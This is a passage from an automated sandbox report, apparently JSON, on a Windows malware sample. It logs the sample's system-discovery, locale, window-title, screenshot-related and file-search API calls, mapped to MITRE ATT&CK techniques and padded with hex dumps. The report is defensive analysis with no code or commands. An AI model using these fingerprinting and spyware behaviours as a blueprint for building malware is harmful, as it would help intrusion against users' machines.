(UID: 00000000-00005972)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb1d76c0eb22000090fd7f9a5c5e7700f0fd7f60c612004490fd7f00000000400000003f000000200000000090fd7f54c61200c15c5e7760826577200000000090fd7f9a5c5e7700f0fd7f78c6120057895d778083657713176075d8eb1d76 (UID: 00000000-00000940)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb1d76e0c81c0000c0fd7f9a5c5e7700f0fd7f60c6120044c0fd7f00000000400000003f0000002000000000c0fd7f54c61200c15c5e77608265772000000000c0fd7f9a5c5e7700f0fd7f78c6120057895d778083657713176075d8eb1d76 (UID: 00000000-00004664)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a0010000d21bf101d01bf1010016f1010000ee01e414f101880000008800000017685d779817f101ff2b5d7751465177a41bf101ac016000000060000000ee01c06dee011200a200b5020000c06dee015016f101100000000000000013009d00b5020000c06dee01 (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb1d7600da640000c0fd7f9a5c5e7700f0fd7f60c6120044c0fd7f00000000400000003f0000002000000000c0fd7f54c61200c15c5e77608265772000000000c0fd7f9a5c5e7700f0fd7f78c6120057895d778083657713176075d8eb1d76 (UID: 00000000-00005576)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a0010000d21bcd01d01bcd010016cd010000ca01e414cd01880000008800000017685d779817cd01ff2b5d7761465177a41bcd01ac011600000016000000ca01c06dca011000ac0079030000c06dca015016cd0110000000000000001100a70079030000c06dca01 (UID: 00000000-00005612)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a0010000d21bb301d01bb3010016b3010000b001e414b301880000008800000017685d779817b301ff2b5d774c3e5177a41bb301ac012300000023000000b001c06db0011200a200fb040000c06db0015016b301100000000000000013009d00fb040000c06db001 (UID: 00000000-00005784)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb1d7690101e0000a0fd7f9a5c5e7700f0fd7f60c6120044a0fd7f00000000400000003f0000002000000000a0fd7f54c61200c15c5e77608265772000000000a0fd7f9a5c5e7700f0fd7f78c6120057895d778083657713176075d8eb1d76 (UID: 00000000-00001308)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a00100005a1bae01581bae018815ae010000ab016c14ae01880000008800000017685d772017ae01ff2b5d77ec2251772c1bae01ac012600000026000000ab01905bab011000ac00ce040000905bab01d815ae0110000000000000001100a700ce040000905bab01 (UID: 00000000-00004928)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a0010000d21bc901d01bc9010016c9010000c601e414c901880000008800000017685d779817c901ff2b5d7791205177a41bc901ac012f0000002f000000c601c06dc6011200a20090050000c06dc6015016c901100000000000000013009d0090050000c06dc601 (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb1d76400734000030fd7f9a5c5e7700f0fd7f60c612004430fd7f00000000400000003f000000200000000030fd7f54c61200c15c5e7760826577200000000030fd7f9a5c5e7700f0fd7f78c6120057895d778083657713176075d8eb1d76 (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a0010000d21bc901d01bc9010016c9010000c601e414c901880000008800000017685d779817c901ff2b5d77be275177a41bc901ac011f0000001f000000c601c06dc6011200a200fb040000c06dc6015016c901100000000000000013009d00fb040000c06dc601 (UID: 00000000-00005824)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a0010000d21b4901d01b49010016490100004601e4144901880000008800000017685d7798174901ff2b5d77891a5177a41b4901ac0122000000220000004601c06d46011200a20090050000c06d460150164901100000000000000013009d0090050000c06d4601 (UID: 00000000-00005972)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a00100005a1b5301581b530188155301000050016c145301880000008800000017685d7720175301ff2b5d77d91651772c1b5301ac011e0000001e0000005001905b50011000ac003e040000905b5001d815530110000000000000001100a7003e040000905b5001 (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a0010000d21bc201d01bc2010016c2010000bf01e414c201880000008800000017685d779817c201ff2b5d777c0a5177a41bc201ac012800000028000000bf01c06dbf011400980061010000c06dbf015016c20110000000000000001500930061010000c06dbf01 (UID: 00000000-00005260)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb1d7630ed63000050fd7f9a5c5e7700f0fd7f60c612004450fd7f00000000400000003f000000200000000050fd7f54c61200c15c5e7760826577200000000050fd7f9a5c5e7700f0fd7f78c6120057895d778083657713176075d8eb1d76 (UID: 00000000-00003164)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a00100005a1be301581be3018815e3010000e0016c14e301880000008800000017685d772017e301ff2b5d77ce0a51772c1be301ac011a0000001a000000e001905be0011000ac0090050000905be001d815e30110000000000000001100a70090050000905be001 (UID: 00000000-00006032)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a0010000d21b3701d01b37010016370100003401e4143701880000008800000017685d7798173701ff2b5d7771035177a41b3701ac0119000000190000003401c06d34011200a200fb040000c06d340150163701100000000000000013009d00fb040000c06d3401 (UID: 00000000-00005588)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a0010000d21bc301d01bc3010016c3010000c001e414c301880000008800000017685d779817c301ff2b5d7759055177a41bc301ac012a0000002a000000c001c06dc0011200a2003c040000c06dc0015016c301100000000000000013009d003c040000c06dc001 (UID: 00000000-00004112)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a0010000d21b4901d01b49010016490100004601e4144901880000008800000017685d7798174901ff2b5d7726f65177a41b4901ac0118000000180000004601c06d460114009800f4010000c06d460150164901100000000000000015009300f4010000c06d4601 (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb1d7670e81c0000f0fd7f9a5c5e7700e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15c5e77608265772000000000f0fd7f9a5c5e7700e0fd7f78c6120057895d778083657713176075d8eb1d76 (UID: 00000000-00003120)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a0010000d21bf101d01bf1010016f1010000ee01e414f101880000008800000017685d779817f101ff2b5d77e7f65177a41bf101ac016100000061000000ee01c06dee011200a2003c040000c06dee015016f101100000000000000013009d003c040000c06dee01 (UID: 00000000-00003168)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a0010000d21bc801d01bc8010016c8010000c501e414c801880000008800000017685d779817c801ff2b5d7794ee5177a41bc801ac012b0000002b000000c501c06dc501140098001d000000c06dc5015016c8011000000000000000150093001d000000c06dc501 (UID: 00000000-00003988)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a0010000d21bf001d01bf0010016f0010000ed01e414f001880000008800000017685d779817f001ff2b5d77d3ee5177a41bf001ac012700000027000000ed01c06ded0114009800b1020000c06ded015016f001100000000000000015009300b1020000c06ded01 (UID: 00000000-00004168)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a00100005a1b5501581b550188155501000052016c145501880000008800000017685d7720175501ff2b5d771aef51772c1b5501ac011a0000001a0000005201905b52011000ac006f010000905b5201d815550110000000000000001100a7006f010000905b5201 (UID: 00000000-00005636)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750595d7798010000a0010000d21bb201d01bb2010016b2010000af01e414b201880000008800000017685d779817b201ff2b5d7786e15177a41bb201ac012000000020000000af01c06daf011400980061010000c06daf015016b20110000000000000001500930061010000c06daf01 (UID: 00000000-00005428)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005576)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005612)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005784)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004928)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005824)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005972)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005792)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006032)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005588)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004112)\n \"LSASS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003120)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003168)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00000940)\n \"D3_08.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004664)\n \"IExplorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005576)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"GetForegroundWindow\" (UID: 00000000-00000940)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"GetWindowTextA\" (UID: 00000000-00000940)\n \"D3_08.exe\" called \"GetWindowTextA\" (UID: 00000000-00004664)\n \"IExplorer.exe\" called \"GetWindowTextA\" (UID: 00000000-00005576)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000070f0210068da1200b344756a81d09d760000000000000000000000000000000000000000000000001401000000000000000000000000000027061d19d186b01924df12005ecb9b761401000000000000005d997680e112000e5d997618dd1200dcaa9d76010000000000000072000000ffffffffffffffffa0da1200780200000000000025000000a0da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360072011d19f8da12006d828e76746d220004010000 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003900320030003000310061003100610031006100650061006500300036006600640062006600030000000000000002000000a8eb2200204c2000286d1e003200020001000000f40100000a0000000000000000000000284c2000c201000009000000f0711e0005000000000000003200000088f32200a0c51200cc415e77a8eb220028000000fc000000ff2b5d77b0645177d8eb1d76ac011e0000001e0031000700010000000000ffff95010000040000000100000032000200010000000300000001000000000000000000000038701e00f8070000200000000000000000000000 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000240001000000ffffffff0200000008000000f8e92200f8e92200f3e922000000000002000000b88f200000000000010000080000000068ec120095e1597738b31e00feffffffe0d912003f08607602000000b88f2000000000000100001888fb5f76d0d91200c81c9d76a6db120095fb5f7604db1200b88f20000000000000000000000000008cda120000001e007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360086011d194cda12006d828e76746d220004010000 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600ee081d1964d312006d828e767c6d240004010000 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000109b2200b8cf1200b344756a81d09d7600000000000000000000000000000000000000000000000060010000000000000000000000000000f7131d19a193b01974d412005ecb9b766001000000000000005d9976d0d612000e5d997668d21200dcaa9d7601000000000000007a000000fffffffffffffffff0cf1200780200000000000025000000f0cf12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600820b1d1948d012006d828e764473240004010000 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002400003b000000001e000000000058752400accf120004645d7738011e00e0635d7702000000b88f2000000000000100000838b31e00feffffffbcc76577c0c765770a000000200f000000001e0030732400f83b0000ff07000000001e00000000007f070000c4001e0008301e00962300005ccf120067e55a7700001e00307324000000000000001e00000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600d6141d199ccf12006d828e764473240004010000 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002400f0722400eb722400000000000000000000001e0000000001e4cb12000000000048d9120095e1597738b31e00feffffff435c5d7750595d77aa000000b8000000ea722400e87224006ccd1200a4d11200000000000000000000000000000000000000000000000000e01b000000001e001c5c5c7760d85f75ffffffff170000001ccd120024000000030000000cd2120038d71200a4d112008600000048cd120096ed5d7712732400a06a3375860000006ccd1200a4d112000000000086008800a06a33756ccd1200916c337512732400a06a3375a06a3375dcd1120002020000 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000940)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004664)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000078b21a0068da1200b344756a81d09d7600000000000000000000000000000000000000000000000014010000000000000000000000000000a5ea5f19a06fa01924df12005ecb9b761401000000000000005d997680e112000e5d997618dd1200dcaa9d76010000000000000072000000ffffffffffffffffa0da1200780200000000000025000000a0da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360077ea5f19f8da12006d828e7634691b0004010000 (UID: 00000000-00004664)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004664)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006500780065000000000000000000000000000000000000000000000000000000000000000000030000000000000002000000c8c81c00f04a1900f86b17003200020001000000f40100000a0000000000000000000000f84a1900c201000009000000c0701700050000000000000032000000a8d01c00a0c51200cc415e77c8c81c0028000000fc000000ff2b5d774a6a5177d8eb1d76ac0117000000170031000700010000000000ffffd40000000400000001000000320002000100000003000000010000000000000000000000086f1700f8070000200000000000000000000000 (UID: 00000000-00004664)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001c0001000000ffffffff020000000800000040ed1c0040ed1c003bed1c000000000002000000088e190000000000010000080000000068ec120095e15977c2bd1e00feffffffe0d912003f08607602000000088e1900000000000100001888fb5f76d0d91200c81c9d76a6db120095fb5f7604db1200088e19000000000000000000000000008cda1200000017007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360083ea5f194cda12006d828e7634691b0004010000 (UID: 00000000-00004664)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600ebe35f1964d312006d828e76548f1c0004010000 (UID: 00000000-00004664)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"IsWow64Process\" with parameter \"940\" - (UID: 00000000-00000940)\n \"D3_08.exe\" called \"IsWow64Process\" with parameter \"4664\" - (UID: 00000000-00004664)\n \"IExplorer.exe\" called \"IsWow64Process\" with parameter \"5576\" - (UID: 00000000-00005576)\n \"WINLOGON.EXE\" called \"IsWow64Process\" with parameter \"1308\" - (UID: 00000000-00001308)\n \"CSRSS.EXE\" called \"IsWow64Process\" with parameter \"5884\" - (UID: 00000000-00005884)\n \"SERVICES.EXE\" called \"IsWow64Process\" with parameter \"3164\" - (UID: 00000000-00003164)\n \"LSASS.EXE\" called \"IsWow64Process\" with parameter \"3120\" - (UID: 00000000-00003120)\n \"SMSS.EXE\" called \"IsWow64Process\" with parameter \"4116\" - (UID: 00000000-00004116)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005576)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005612)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005784)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004928)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005824)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005972)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005260)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006032)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005588)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004112)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003120)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003168)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003988)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004168)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005636)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005428)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004172)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001916)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006056)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005980)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003856)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002060)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"340109a9\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"340109a9\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"340109a9\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"340109a9\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"340109a9\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"340109a9\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"340109a9\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"340109a9\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"34010909\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"34010909\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"34010909\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"34010909\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"34010909\"\n \"cx\": \"16\"\n \"cy\": \"16\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FindNextFileW\" with parameter Boot (UID: 